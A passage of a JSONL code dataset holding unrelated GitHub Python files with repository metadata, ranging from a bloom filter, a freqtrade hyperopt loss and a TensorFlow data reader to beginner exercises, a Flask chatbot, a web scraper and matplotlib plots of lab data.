f'{point_dir}/domain_{i:07}_{lon:0.5f}_{lat:0.5f}.nc'\n params_fn = f'{point_dir}/params_{i:07}_{lon:0.5f}_{lat:0.5f}.nc'\n\n # skip over existing files\n # if not os.path.exists(domain_fn):\n point_domain.to_netcdf(domain_fn)\n\n # if not os.path.exists(params_fn):\n point_params.to_netcdf(params_fn)\n\n runtime = round((time.time() - start_time)/60/60, 2)\n print(f\"Processing completed in {runtime} hours\")\n\n\nif __name__ == \"__main__\":\n output_dir = '/rcfs/projects/godeeep/VIC/inputs_1_16_deg_by_huc2/'\n process(output_dir)\n","repo_name":"GODEEEP/tgw-hydro","sub_path":"params/param-subset-by-huc2.py","file_name":"param-subset-by-huc2.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"32143310092","text":"import sys\n'''\ncomandline arguments:\n bloomfilter.bin size num_hashes checked_data\n'''\n\n\n#reads in the filter\nwith open(sys.argv[1], 'rb') as file:\n FILTER = int.from_bytes(file.read(), byteorder='big')\n\nsize = int(sys.argv[2])\nk = int(sys.argv[3])\nb = 1\n\n#checks the hashes against the filter\nfor i in range(k):\n if not (pow(2, hash(sys.argv[4] + str(i)) % size) & FILTER == pow(2, hash(sys.argv[4] + str(i)) % size)):\n print(sys.argv[4] + \" is not in the list\")\n quit()\n\nprint(sys.argv[4] + \" is likely in the list\")\n\n\n","repo_name":"HenryHelstad/Simple-Bloomfilter","sub_path":"sifter.py","file_name":"sifter.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} 
+{"seq_id":"17209640593","text":"import csv\nimport numpy as np\nfrom smoothing import gaussian_kernel\nimport sys\nsys.path.insert(0,'../Prob_mapgen/')\nfrom create_images import find_crop, create_images\nf=np.load(sys.argv[1])\ndata=csv.reader(open('../Data/4secmodel.csv','r'))\ncoords=csv.reader(open('../Data/4secmodelcoords.csv','r'))\nvals=data.__next__()\ncs=coords.__next__()\nM=np.zeros((512,512,35))\n\nconv=lambda x: (x//512,x%512)\nc=0\nsuffix=sys.argv[1].split('/')[-1].split('.')[0]\n\nwhile c < len(f):\n vals=data.__next__()\n cs=coords.__next__()\n if vals[5]!=suffix:continue\n\n sl=int(vals[4])\n x,y=conv(int(cs[0]))\n if len(f.shape)==1 or f.shape[1]==1:\n M[x,y,sl]=int((1-f[c])*255) #Correction for how I processed it earlier\n else:\n M[x,y,sl]=int(f[c,1]*255)\n c+=1\n\n\nres1=[]\nres2=[]\n#for sigma in np.arange(0,10,0.3):\nsigma=2.5\nMn=gaussian_kernel(np.copy(M),sigma)\n#Get accuracy\nhits=[0,0]\ntot=[0,0]\n\nrefF=np.load('../Data/4secmodel.npz')\nref=refF[suffix+'_label']\nfor z in range(35):\n bounds=find_crop(ref[:,:,z])\n for x in range(bounds[0],bounds[1]):\n for y in range(bounds[2],bounds[3]):\n if ref[x,y,z,0]>0:\n tot[0]+=1\n if Mn[x,y,z]<0.5*255:\n hits[0]+=1\n elif ref[x,y,z,1]>0:\n tot[1]+=1\n if Mn[x,y,z]>0.5*255:\n hits[1]+=1\n#res1.append(hits[0]/tot[0])\n#if (tot[1]==0): res2.append(0)\n#else:res2.append(hits[1]/tot[1])\n\n# import matplotlib.pyplot as plt\n# plt.plot(np.arange(0,10,0.3),res1,c='b')\n# plt.plot(np.arange(0,10,0.3),res2,c='r')\n\n# plt.xlabel('Sigma')\n# plt.ylabel('Accuracy')\n# plt.title('Accuracy for sigma of gaussian kernel (blue is non-cancer')\n# plt.show()\nprint ('Accuracies',hits[0]/tot[0],hits[1]/tot[1])\n\ncreate_images(Mn,ref,suffix,sys.argv[2])\n","repo_name":"PeterQLee/PythonOpenGLtest","sub_path":"Work/BIOTIC/post_convolution/run_flat.py","file_name":"run_flat.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21312969423","text":"import collections\n\nimport tensorflow as tf\n\nfrom dataset import ptb\n\n__all__ = [\n 'train_batch',\n 'test_batch',\n 'valid_batch',\n 'vocab',\n 'Input',\n]\n\n\nclass Input(collections.namedtuple('Input', (\n 'initializer',\n 'x',\n 'y',\n))):\n pass\n\n\ndef vocab(min_word_freq=None):\n return ptb.get_vocab(min_word_freq)\n\n\ndef batch_input(x, y, batch_size, shuffle, eager_execution):\n x_dataset = tf.data.Dataset.from_tensor_slices(x)\n y_dataset = tf.data.Dataset.from_tensor_slices(y)\n\n dataset = tf.data.Dataset.zip((x_dataset, y_dataset))\n if shuffle:\n dataset = dataset.shuffle(buffer_size=100000 * batch_size)\n dataset = dataset.batch(batch_size, drop_remainder=True)\n\n if eager_execution:\n return dataset\n else:\n batched_iter = tf.compat.v1.data.make_initializable_iterator(dataset)\n cur_words, next_words = batched_iter.get_next()\n return Input(\n initializer=batched_iter.initializer, x=cur_words, y=next_words)\n\n\ndef train_batch(vocab,\n batch_size,\n max_length=50,\n stride=3,\n shuffle=False,\n eager_execution=True):\n x, y = ptb.train(vocab, max_length, stride)\n return batch_input(x, y, batch_size, shuffle, eager_execution)\n\n\ndef test_batch(vocab,\n batch_size,\n max_length=50,\n stride=3,\n shuffle=False,\n eager_execution=True):\n x, y = ptb.test(vocab, max_length, stride)\n return batch_input(x, y, batch_size, shuffle, eager_execution)\n\n\ndef valid_batch(vocab,\n batch_size,\n max_length=50,\n stride=3,\n shuffle=False,\n eager_execution=True):\n x, y = 
ptb.valid(vocab, max_length, stride)\n return batch_input(x, y, batch_size, shuffle, eager_execution)\n","repo_name":"lcy-seso/Carrot","sub_path":"benchmarks/rnnlm/tf_model/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"40032458703","text":"def impar(dados):\n Result = 0\n X,Y = map(int,dados)\n if X > Y:\n c = X\n X = Y\n Y = c\n if X ==Y:\n return 0 \n for i in range(X+1,Y):\n if i%2:\n Result = Result+i\n return Result\n\n\nN = int(input())\ndados = [input().split()for i in range(N)]\nfor i in dados: \n print(impar(i))","repo_name":"juaryR/Challenges_Algorithms","sub_path":"beecrowd/Iniciante/1099.py","file_name":"1099.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12301627993","text":"nota = 0\r\n\r\npessoas = float(input('Quantas pessoas vão viajar ? '))\r\ndiaP = (input('compraram a passagem 3 dias antes do embarque (S) para sim (N) ? '))\r\ndiaria = float(input('quantos dias irão ficar '))\r\nat = float(input('Os dois tiveram a autorização para ferias (1) para sim (2) para não '))\r\nfilho = (input('Tem filhos (S) para sim (N) para não '))\r\nif filho == 'S':\r\n nota = float(input('informe a nota do filho ')) \r\n\r\nsalario = (input('O salario foi liberado antes do dia 12 de dezembro (S) para sim (N) para não '))\r\n\r\nif diaP == 'S':\r\n total = 1100 * pessoas\r\n diar = 566.66 * diaria\r\n totalFull = total + diar \r\nelse:\r\n total = 890 * pessoas\r\n diar = float(566.66 * diaria)\r\n totalFull = total + diar \r\nif at == 1:\r\n atv = 'A'\r\nelse:\r\n atv = 'B'\r\n\r\n\r\nif nota >= 6:\r\n notaV = 'A'\r\nelse:\r\n notaV = 'B'\r\n\r\nif salario == 'S':\r\n salarioV = 'A'\r\nelse:\r\n salario = 'B' \r\n\r\nif totalFull <= 10000:\r\n NaN = 'A'\r\nelse:\r\n NaN = 'B'\r\n\r\nif atv == 'A' and notaV == 'A' and salarioV == 'A' and NaN == 'A':\r\n print('Pode viajar filho')\r\nelse:\r\n print('Num pode')\r\n\r\nprint('Valor total: %d' %totalFull)","repo_name":"LiR4/ex-python","sub_path":"ex/ex-2.py","file_name":"ex-2.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"18346536897","text":"\"\"\"\nSortinoHyperOptLossDaily\n\nThis module defines the alternative HyperOptLoss class which can be used for\nHyperoptimization.\n\"\"\"\nimport math\nfrom datetime import datetime\n\nfrom pandas import DataFrame, date_range\n\nfrom freqtrade.optimize.hyperopt import IHyperOptLoss\n\n\nclass SortinoHyperOptLossDaily(IHyperOptLoss):\n \"\"\"\n Defines the loss function for hyperopt.\n\n This implementation uses the Sortino Ratio calculation.\n \"\"\"\n\n @staticmethod\n def hyperopt_loss_function(results: DataFrame, trade_count: int,\n min_date: datetime, max_date: datetime,\n *args, **kwargs) -> float:\n \"\"\"\n Objective function, returns smaller number for more optimal results.\n\n Uses Sortino Ratio calculation.\n\n Sortino Ratio calculated as described in\n http://www.redrockcapital.com/Sortino__A__Sharper__Ratio_Red_Rock_Capital.pdf\n \"\"\"\n resample_freq = '1D'\n slippage_per_trade_ratio = 0.0005\n days_in_year = 365\n minimum_acceptable_return = 0.0\n\n # apply slippage per trade to profit_ratio\n results.loc[:, 'profit_ratio_after_slippage'] = \\\n results['profit_ratio'] - slippage_per_trade_ratio\n\n # create the index within 
the min_date and end max_date\n t_index = date_range(start=min_date, end=max_date, freq=resample_freq,\n normalize=True)\n\n sum_daily = (\n results.resample(resample_freq, on='close_date').agg(\n {\"profit_ratio_after_slippage\": 'sum'}).reindex(t_index).fillna(0)\n )\n\n total_profit = sum_daily[\"profit_ratio_after_slippage\"] - minimum_acceptable_return\n expected_returns_mean = total_profit.mean()\n\n sum_daily['downside_returns'] = 0.0\n sum_daily.loc[total_profit < 0, 'downside_returns'] = total_profit\n total_downside = sum_daily['downside_returns']\n # Here total_downside contains min(0, P - MAR) values,\n # where P = sum_daily[\"profit_ratio_after_slippage\"]\n down_stdev = math.sqrt((total_downside**2).sum() / len(total_downside))\n\n if down_stdev != 0:\n sortino_ratio = expected_returns_mean / down_stdev * math.sqrt(days_in_year)\n else:\n # Define high (negative) sortino ratio to be clear that this is NOT optimal.\n sortino_ratio = -20.\n\n # print(t_index, sum_daily, total_profit)\n # print(minimum_acceptable_return, expected_returns_mean, down_stdev, sortino_ratio)\n return -sortino_ratio\n","repo_name":"freqtrade/freqtrade","sub_path":"freqtrade/optimize/hyperopt_loss/hyperopt_loss_sortino_daily.py","file_name":"hyperopt_loss_sortino_daily.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":23465,"dataset":"github-code","pt":"94"} +{"seq_id":"40275317285","text":"from utilities.file_utils import get_folder_path, get_files, save_excel\nfrom utilities.photo_data import get_photo_data\n\n\ndef main():\n folder_path = get_folder_path()\n\n # get all .jpg files from folder\n photo_files = get_files(folder_path, name_filter=\".jpg\")\n\n if not photo_files:\n print(f\"I couldn't find any photos in this folder: {folder_path}\")\n return\n\n # send files to photo_data\n photo_data_list = get_photo_data(photo_files)\n\n # save excel file\n save_excel(photo_data_list, folder_path)\n\n\nif __name__ == '__main__':\n main()","repo_name":"robertvari/python_alapok_211106_2","sub_path":"Photo_To_Excel/PhotoToExcel.py","file_name":"PhotoToExcel.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"36845357550","text":"import requests\nimport random\nimport math\nimport json\nfrom flask import Flask, request, abort\nfrom flask_cors import CORS\napp = Flask(__name__)\nCORS(app)\n\ndef within_range(num):\n if num in range(10000, 999999):\n return True\n else:\n return False\n\n\n#Get array of quantum numbers combine into long seed\ndef quantum_seed():\n res = requests.get(\"http://qrng.anu.edu.au/API/jsonI.php?length=8&type=uint16\")\n json = res.json()\n val = [str(i) for i in json[\"data\"] ]\n return int(\"\".join(val))\n\n\ndef gauss(mu, sigma, seed):\n #Pass seed from API call\n random.seed(seed)\n gauss_next = None\n z = gauss_next\n if z is None:\n x2pi = random.random() * math.tau \n g2rad = math.sqrt(-2.0 * math.log(1.0 - random.random()))\n z = math.cos(x2pi) * g2rad\n gauss_next = math.sin(x2pi) * g2rad\n\n return mu + z * sigma\n\ndef trim(lat, lon):\n #Round numbers to nearest hundreth thousand then multiply\n return {\n \"latitude\": int(round(lat, 6) * 1000000),\n \"longitude\": int(round(lon, 6) * 1000000)\n }\n\n\n@app.route(\"/location\")\ndef location():\n mean = float(request.args.get(\"mean\"))\n if within_range(mean):\n v = 1000000.0 #Constant for dividing to nearest hundred thousandths place\n coords = 
trim(float(request.args.get(\"latitude\")), float(request.args.get(\"longitude\")))\n latitude = float(gauss(coords[\"latitude\"], mean, quantum_seed()))\n longitude = float(gauss(coords[\"longitude\"], mean, quantum_seed()))\n \n return ({\n \"success\": True,\n \"latitude\": latitude / v,\n \"longitude\": longitude / v,\n })\n else:\n abort(400, {\n \"success\": False,\n \"message\": \"bad request, check your parameters\",\n })\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"CodyCline/random_maps","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39844546148","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 20 05:31:07 2019\n\n@author: glavigna\n\"\"\"\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\ndef generador_senoidal (fs, f0, N, a0=1, p0=0):\n \n ts = 1/fs # tiempo de muestreo \n \n #Genero el espacio para poder tener el espacio temporal que va de 0 a N-1\n #Flatten convierte a un array de 1 dimensión.\n tt = np.linspace(0, (N-1)*ts, N).flatten()\n \n # Concatenación de matrices:\n # guardaremos las señales creadas al ir poblando la siguiente matriz vacía\n signal = np.array([], dtype=np.float).reshape(N,0)\n \n #Genero la senoidal\n signal = a0 * np.sin(2 * np.pi * f0 * tt + p0);\n \n return tt,signal\n\nsenoidal = generador_senoidal(fs = 1000, f0 = 500, N = 1000, a0 = 1, p0 = (np.pi)/2);\n\nplt.figure(1)\nline_hdls = plt.stem(senoidal[0], senoidal[1])\nplt.title('Señal: ' + 'Senoidal')\nplt.xlabel('tiempo [segundos]')\nplt.ylabel('Amplitud [V]')\n \nplt.show()","repo_name":"gonzalolavigna/mese_2018_pds","sub_path":"generar_senoildal_tb.py","file_name":"generar_senoildal_tb.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5139911874","text":"from nltk.tokenize import word_tokenize\nimport json\nfrom flask import Flask, request, jsonify,render_template, url_for\nimport numpy\nimport pickle\nimport requests\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\nflag = 0\n@app.route('/api',methods=['POST','GET'])\ndef hello():\n\t\n\tx1 = []\n\tmodel = pickle.load(open('func.pkl','rb'))\n\tdata = request.get_json(force = True)\n\tif(data['type']==\"text\"):\n\t\tz = chatbot(data['moviename'])\n\t\treturn jsonify(z)\n\telse:\n\t\ttry: \n\t\t prediction = model(data['moviename'])\n\t\t if(prediction.size>0):\n\t\t \tfor i in prediction:\n\t\t \t\tx1.append(i)\n\t\t \toutput1 = {'name1' : x1,'type' : 'movie1'}\n\t\t \treturn jsonify(output1)\n\t\t else:\n\t\t \treturn jsonify(chatbot(\"Not in DB\"))\n\n\n\t\texcept KeyError:\n\t\t\treturn jsonify(chatbot(\"Not in DB\"))\n\n\t\texcept TypeError:\n\t\t\treturn jsonify(chatbot(\"Not in DB\"))\t\n\ndef chatbot(l):\n\tmovie = ['movie', 'movies', 'films', 'film']\n\tgreet = ['hey','hello','hi','hii','hiii','heyy','heyo']\n\tthank = ['thanks','thankyou', 'thank you','thenks','thank you','thank','bye']\n\n\tif(l == \"Not in DB\"):\n\t\treturn({\"name1\":\"Sorry this movie is not in my database\",\"type\":\"text\"})\n\n\tl = l.lower()\n\ts = word_tokenize(l)\n\tfor i in range(len(s)):\n\t\tfor j in range(len(movie)):\n\t\t\tif(s[i] == movie[j]):\n\t\t\t\treturn({\"name1\":\"Please tell me a movie name you like, this would help me give you personalized 
recommendations.\",\"type\":\"movie\"})\n\t \n\t\tfor j in range(len(greet)):\n\t\t\tif(s[i]==greet[j]):\n\t\t\t\treturn({\"name1\":\"Hi Human! How can I help?\",\"type\":\"text\"})\n\t \n\t\tfor j in range(len(thank)):\n\t\t\tif(s[i]==thank[j]):\n\t\t\t\treturn({\"name1\":\"Glad to help!\"})\n\n\t\t\t\n\treturn({\"name1\":\"I am not trained yet for that! Please try again\",\"type\":\"text\"})\n \n\n\n\nif __name__ == '__main__':\n\tapp.run(port=5000, debug=True)\n","repo_name":"govesnaman/MovieBot","sub_path":"customserver.py","file_name":"customserver.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23031408670","text":"lista = list()\r\nwhile True:\r\n n = int(input('Digite um valor: '))\r\n if n in lista:\r\n print('\\033[31mEsse número já foi adicionado anteriormente!\\033[m')\r\n else:\r\n lista.append(n)\r\n print('\\033[32mNúmero adicionado com sucesso!\\033[m')\r\n while True:\r\n op = str(input('Deseja inserir outro valor [ S / N ]: ')).strip().upper()[0]\r\n if op in 'SN':\r\n break\r\n else:\r\n print('\\033[31mNão digitou uma opção válida. Tente novamente!\\033[m')\r\n if op == 'N':\r\n break\r\nprint('-='*30)\r\nlista.sort()\r\nprint('Você digitou os números (em ordem crescente) :', end='')\r\nfor c in lista:\r\n print(f'{c} ... ', end='')\r\n","repo_name":"felipebbarreto/CursoemvideoPython","sub_path":"ex079.py","file_name":"ex079.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"44685830660","text":"\"\"\"\n\nimportant in the interpolationSearch\n\n pos = lo + ((hi - lo) // (arr[hi] - arr[lo]) *\n (x - arr[lo]))\n \n \n \n \n\"\"\"\n\n\n\n\n \ndef interpolationSearch(arr, lo, hi, x):\n \n # Since array is sorted, an element present\n # in array must be in range defined by corner\n if (lo <= hi and x >= arr[lo] and x <= arr[hi]):\n \n # Probing the position with keeping\n # uniform distribution in mind.\n pos = lo + ((hi - lo) // (arr[hi] - arr[lo]) *\n (x - arr[lo]))\n \n # Condition of target found\n if arr[pos] == x:\n return pos\n \n # If x is larger, x is in right subarray\n if arr[pos] < x:\n return interpolationSearch(arr, pos + 1,\n hi, x)\n \n # If x is smaller, x is in left subarray\n if arr[pos] > x:\n return interpolationSearch(arr, lo,\n pos - 1, x)\n return -1\n \n\n\n\n\n \na = [1,2,3,4,5,6,7,8,9,10,12,13] \nx = 12\nn = len(a)\ni = interpolationSearch(a , 0, n-1, x)\nprint(a[i],i)\n\n\n \n \n ","repo_name":"udayhacks/DSA","sub_path":"algorithms/interpolation_search.py","file_name":"interpolation_search.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18814155735","text":"# SVR model\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('Car_Purchasing_Data.csv' , encoding='ISO-8859-1')\r\nX = dataset.iloc[:, 2:-1].values\r\ny = dataset.iloc[:, -1].values\r\ny = y.reshape(-1,1)\r\n\r\n# Encoding the Independent Variable\r\nfrom sklearn.preprocessing import LabelEncoder\r\nle = LabelEncoder()\r\nX[:,0] = le.fit_transform(X[:,0])\r\n\r\n# Splitting data into test set and training set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 
1)\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nsc_y = StandardScaler()\r\nX_train = sc_X.fit_transform(X_train)\r\nX_test = sc_X.transform(X_test)\r\ny_train = sc_y.fit_transform(y_train)\r\ny_test = sc_y.transform(y_test)\r\n\r\n# Training the SVR model on the whole dataset\r\nfrom sklearn.svm import SVR\r\nregressor = SVR(kernel = 'linear')\r\nregressor.fit(X_train, y_train)\r\n\r\ny_pred = sc_y.inverse_transform(regressor.predict(X_test))\r\nX_test = sc_X.inverse_transform(X_test)\r\n","repo_name":"deepanshu79/Prediction-of-car-purchase-amount","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35572584102","text":"import mysql.connector, json, csv\n\nuserFile = 'C:/Users/lifeiteng/projects/visualizer/getRank/user data/user.json'\n\n\nwith open(userFile) as json_file:\n user_data = json.load(json_file)\n\n# text = []\n\n # text.append(row)\n\nuserFileCSV = 'C:/Users/lifeiteng/projects/visualizer/getRank/user data/user.csv'\n\nidx = 1\nwith open(userFileCSV, 'w', newline = '', encoding='utf-8') as csv_file:\n writer = csv.writer(csv_file)\n for user_name in user_data:\n for contest in user_data[user_name]:\n rank = user_data[user_name][contest]\n # print('%s %d %d' % (user_name, contest, rank))\n writer.writerow([idx, user_name, contest, rank])\n idx += 1\n","repo_name":"feiteng/webcrawlerdemo","sub_path":"getRank/code/methods/[Data] JSON_SaveToCSV.py","file_name":"[Data] JSON_SaveToCSV.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1515131579","text":"# Input: s = \"leetcode\", wordDict = [\"leet\",\"code\"]\n# Output: true\n# Explanation: Return true because \"leetcode\" can be segmented as \"leet code\".\n\ndef wordBreak(s,wordDict):\n word_set=set(wordDict)\n n=len(s)\n dp=[False]*(n+1)\n dp[0]=True\n for i in range(1,n+1):\n for j in range(i):\n if dp[j] and s[j:i] in word_set:\n dp[i]=True\n break\n return dp[n]\n\ns = \"leetcode\"\nwordDict = [\"leet\",\"code\"]\nprint(wordBreak(s,wordDict))","repo_name":"Abhidharsh-subhash/workout-problems","sub_path":"139.py","file_name":"139.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71061233271","text":"from django.shortcuts import render\nimport requests\nfrom bs4 import BeautifulSoup\n\n# Create your views here.\ndef home(request):\n if request.method==\"POST\":\n url=request.POST.get('url', '')\n dom_type = request.POST.get('domType', '') \n class_name = request.POST.get('class', '') \n pdom_type = request.POST.get('pdomType', '') \n pclass_name = request.POST.get('pclass', '') \n '''get response'''\n\n response= requests.get(url)\n #check whether the there is connection\n \n if response.status_code==200:#if the connection is successful\n #get soup\n soup=BeautifulSoup(response.content, \"html.parser\")\n #get prices and vehicle names based on data provided\n vehicle_name=soup.find_all(dom_type, class_=class_name)\n vehicle_price = soup.find_all(pdom_type, class_=pclass_name)\n cars=[]\n car_prices=[]\n for name_element, price_element in zip(vehicle_name, vehicle_price):\n name = name_element.get_text(strip=True)\n p = price_element.get_text(strip=True)\n cars.append(name)\n car_prices.append(p)\n 
re=zip(cars,car_prices)\n \n\n\n \n context={\"url\":url, \"myzip\":re,\"vehicles\": cars, \"prices\": car_prices}\n return render(request, 'app/index.html', context)\n else:\n msg=\"Failed to fetch the page:\"\n return render(request, \"app/index.html\", {\"msg\":msg})\n else:\n return render(request, \"app/index.html\")","repo_name":"wjenaro/webscraping","sub_path":"Webscraping with an interface- django/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34249222458","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\nimport matplotlib.ticker as ticker\n#plt.xkcd()\n\nfreq_2=0.2\nperiod_2=1/freq_2\n\nstep2_raw_g6=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step2-group-6.csv\")\nremove_zero=step2_raw_g6.loc[203:,:]\n\nstep2_g6_half_cycle=remove_zero[remove_zero.TimeStamp<=period_2/2]\nstep2_g6_half_cycle.tail()\nstep2_g6_half_cycle.reset_index(drop=True, inplace=True)\nstep2_g6_half_cycle[\"TimeShift\"]=step2_g6_half_cycle.TimeStamp-step2_g6_half_cycle.TimeStamp[0]\n\nstep6_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step6-group-6.csv\")\nstep6_half_cycle=step6_raw[(step6_raw.TimeStamp>=20.24) & (step6_raw.TimeStamp<=22.29)]\nstep6_half_cycle.reset_index(drop=True, inplace=True)\nstep6_half_cycle[\"TimeShift\"]=step6_half_cycle.TimeStamp-step6_half_cycle.TimeStamp[0]\n\n\nstep7_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step7-group-4.csv\")\nstep7_fil=step7_raw.loc[504:, :]\nstep7_fil.reset_index(drop=True, inplace=True)\nstep7_fil[\"TimeShift\"]=step7_fil.TimeStamp-step7_fil.TimeStamp[0]\nstep7_half_cycle=step7_fil[step7_fil.TimeShift<=period_2/2]\n\n\nfreq_11=0.2\nperiod_11=1/freq_11\nstep11_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step11-group-4.csv\")\nstep11_raw[\"TimeShift\"]=step11_raw.TimeStamp-step11_raw.TimeStamp[0]\n\nstep13_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step13-group-3.csv\")\n\nstep13_raw[\"TimeShift\"]=step13_raw.TimeStamp-step13_raw.TimeStamp[0]\n\nstep18_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step18-group-2.csv\")\nstep18_fil=step18_raw.loc[234:, :]\n\nstep18_fil.reset_index(drop=True, inplace=True)\n\nstep18_fil[\"TimeShift\"]=step18_fil.TimeStamp-step18_fil.TimeStamp[0]\nstep18_half_cycle=step18_fil[step18_fil.TimeShift<=period_2/2]\n\nstep27_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step27-group-4.csv\")\nstep27_fil=step27_raw.loc[0:, :]\n\nstep27_fil.reset_index(drop=True, inplace=True)\n\nstep27_fil[\"TimeShift\"]=step27_fil.TimeStamp-step27_fil.TimeStamp[0]\nstep27_half_cycle=step27_fil[step27_fil.TimeShift<=period_2/2]\n\n\nfont = {'family': 'Times New Roman',\n 'color': 'black',\n 'weight': 'normal',\n 'fontsize': 15,\n }\nfig, ax2=plt.subplots(figsize=(10,6))\nax2.plot(step2_g6_half_cycle.TimeShift, step2_g6_half_cycle.Position, color=\"red\", \n linewidth=1.5)\n\nstep2_tex=r\"$f=0.2 Hz$, $A=80\\%$, $K_p=0.14$\"\nax2.text(1.0, 30, step2_tex, fontdict=font, 
color=\"DarkBlue\")\n\nfig,ax6=plt.subplots(figsize=(10,6))\nc_max=step6_half_cycle.Position.max()\nc_final=step6_half_cycle.Position[step6_half_cycle.Position.shape[0]-1]\nax6.plot(step6_half_cycle.TimeShift, step6_half_cycle.Position, color=\"red\", \n linewidth=1.5)\n\nstep6_tex=r\"$f=0.2 Hz$, $A=15\\%$, $K_p=2$\"\nax6.text(1.0, 20, step6_tex, fontdict=font, color=\"DarkBlue\")\n\nax6.scatter([0.09, 0.65], [c_max, c_final], color=\"DarkBlue\")\n\nfig, ax7=plt.subplots(figsize=(10,6))\nax7.plot(step7_half_cycle.TimeShift, step7_half_cycle.Position, color=\"red\", \n linewidth=1.5)\n\nstep7_tex=r\"$f=0.2 Hz$, $A=15\\%$, $K_p=3$\"\nax7.text(1.0, 30, step7_tex, fontdict=font, color=\"DarkBlue\")\n\n#plt.plot(step11_raw.TimeStamp, step11_raw.Position)\nfig, ax11=plt.subplots(figsize=(10,6))\nax11.plot(step11_raw.TimeShift, step11_raw.Reference, color=\"DarkBlue\", \n linewidth=1.5, \n label=\"Reference\")\nax11.plot(step11_raw.TimeShift, step11_raw.Position, color=\"red\", \n linewidth=1.5, \n label=\"Position(%)\")\n\nstep11_tex=r\"$f=0.10 Hz$, $A=10\\%$, $K_p=1.0$\"\nax11.text(2.1, 12, step11_tex, fontdict=font)\n\nfig, ax13=plt.subplots(figsize=(10,6))\nax13.plot(step13_raw.TimeShift, step13_raw.Reference, color=\"DarkBlue\", \n linewidth=1.5, \n label=\"Reference\")\nax13.plot(step13_raw.TimeShift, step13_raw.Position, color=\"red\", \n linewidth=1.5, \n label=\"Position(%)\")\nstep13_tex=r\"$f=0.10 Hz$, $A=10\\%$, $K_p=1.75$\"\nax13.text(0.5, -15, step13_tex, fontdict=font)\n\nfig, ax18=plt.subplots(figsize=(10, 6))\n\nax18.plot(step18_half_cycle.TimeShift, step18_half_cycle.Reference, color=\"DarkBlue\", \n linewidth=1.5, \n label=\"Reference\")\nax18.plot(step18_half_cycle.TimeShift, step18_half_cycle.Position, color=\"red\", \n linewidth=1.5, \n label=\"Position(%)\")\nstep18_tex=r\"$f=0.2 Hz$, $A=15\\%$, $K_p=0.9$\"\nax18.text(0.5, -15, step13_tex, fontdict=font)\n\nfig27, ax27=plt.subplots(figsize=(10,6))\nax27.plot(step27_raw.TimeStamp, step27_raw.Reference, color=\"DarkBlue\", \n linewidth=1.5, \n label=\"Reference\")\nax27.plot(step27_raw.TimeStamp, step27_raw.Position, color=\"red\", \n linewidth=1.5, \n label=\"Position(%)\")\n\nstep27_tex=r\"$f=0.2 Hz$, $A=20\\%$, 